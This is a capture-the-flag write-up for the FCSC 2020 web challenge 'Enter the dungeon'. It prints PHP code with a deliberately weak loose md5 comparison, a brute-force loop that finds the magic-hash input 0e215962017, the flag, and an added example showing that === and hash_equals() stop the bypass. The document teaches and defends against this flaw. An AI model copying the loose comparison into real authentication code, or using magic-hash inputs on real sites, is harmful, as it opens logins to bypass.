FCSC 2020 - Enter the dungeon (web)

Web - Enter the dungeon

After looking at the page source, we can find the backend source code at: http://challenges2.france-cybersecurity-challenge.fr:5002/check_secret.txt

    <?php
    session_start();
    $_SESSION['dungeon_master'] = 0;
    ?>
    <title>Enter The Dungeon</title>
    <body style="background-color:#3CB371;">
    <center><h1>Enter The Dungeon</h1></center>
    <?php
    echo '<div style="font-size:85%;color:purple">For security reason, secret check is disable !</div><br />';
    echo '<pre>'.chr(10);
    echo chr(10).'</pre>';

    // authentication is replaced by an impossible test
    //if(md5($_GET['secret']) == "a5de2c87ba651432365a5efd928ee8f2")
    if(md5($_GET['secret']) == $_GET['secret'])
    {
        // loose comparison (==): this is the line the rest of the write-up targets
        $_SESSION['dungeon_master'] = 1;
        echo "Secret is correct, welcome Master ! You can now enter the dungeon";
    }
    else
    {
        echo "Wrong secret !";
    }
    ?>

Following the code, we need a secret that satisfies:

    md5($_GET['secret']) == $_GET['secret']

A string whose md5 hash is the string itself should be quite hard to find, but not impossible I think. It would just take far too much time to find one.

However, the PHP comparison operator used is ==, which is a loose comparison: PHP converts (juggles) the operand types before comparing the values. For example:

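    php > echo "1000" == 1000;        // string vs. integer
    php > echo "0e123456" == 0;       // "0e123456" is read as 0 * 10^123456
    php > echo "0e1787" == "0e9880";  // two numeric strings are compared as numbers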

There is a lot of material on this here: https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf

So I wanted to find a string of the form 0eX, where X is any run of digits, as long as needed, such that the md5 of this string also starts with 0e.


    <?php
    for ($i = 0;; $i++) {           // try 0e0, 0e1, 0e2, ...
        $test = "0e".$i;
        if (md5($test) == $test) {  // same loose comparison as the backend
            echo $test;
            break;
        }
    }


After a few minutes it found 0e215962017, and we can verify it before sending it:

    php > echo md5("0e215962017") == "0e215962017";

flag : FCSC{f67aaeb3b15152b216cb1addbf0236c66f9d81c4487c4db813c1de8603bb2b5b}
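
The comparison from check_secret.txt next to stricter forms, as an added example that is not part of the challenge or of the original write-up. The function names are hypothetical; the digest and the secret are the values quoted above.

```php
<?php
// Added example, not the challenge's code. Function names are hypothetical.

// "Magic hash": 0e followed only by digits, which PHP reads as the float 0.
function is_magic(string $s): bool {
    return preg_match('/^0+e[0-9]+$/D', $s) === 1;
}

// Same comparison as check_secret.txt: two numeric strings are compared
// as numbers, so 0e<digits> == 0e<other digits>.
function check_loose(string $secret): bool {
    return md5($secret) == $secret;
}

// Strict comparison: same type and identical bytes, no numeric conversion.
function check_strict(string $secret): bool {
    return md5($secret) === $secret;
}

// Form of the commented-out check, hardened: hash_equals() compares the
// two strings byte for byte in constant time.
function check_stored(string $secret, string $stored_md5): bool {
    return hash_equals($stored_md5, md5($secret));
}

$stored = "a5de2c87ba651432365a5efd928ee8f2"; // digest from the commented-out line
$secret = "0e215962017";                       // value found by the search loop

printf("md5(secret)  = %s\n", md5($secret));
printf("is_magic     = %s\n", var_export(is_magic(md5($secret)), true));
printf("check_loose  = %s\n", var_export(check_loose($secret), true));
printf("check_strict = %s\n", var_export(check_strict($secret), true));
printf("check_stored = %s\n", var_export(check_stored($secret, $stored), true));
```

Only check_loose() accepts the value; the === and hash_equals() forms reject it because they never convert the strings to numbers.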